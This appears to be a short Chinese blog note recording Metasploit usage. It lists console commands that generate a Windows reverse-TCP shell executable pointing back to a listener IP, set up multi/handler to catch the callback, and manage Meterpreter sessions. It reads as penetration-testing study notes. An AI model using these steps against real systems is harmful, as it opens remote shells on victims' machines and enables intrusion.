msf 使用记录
1. msfconsole
2. show payloads
3. use windows/shell/reverse_tcp
4. show options
5. set LHOST 192.168.x.x
6. generate -h
7. generate -f r_tcp.exe -t exe
8. use exploit/multi/handler
9. use windows/shell/reverse_tcp (2) windows/meterpreter_reverse_tcp
10. show options
11. set LHOST 192.168.x.x
12. exploit
Meterprefer 使用
1. background 挂入后台session
2. sessions 查看现有的后台 session
3. sessions -i 1 查看后台session id为1
https://bbs.ichunqiu.com/thread-17990-1-1.html?from=bbsrt1
签名档:
从事网络安全和编程的我,很希望能找到志同道合的朋友交流。
欢迎cn博客的好友拍砖,留言。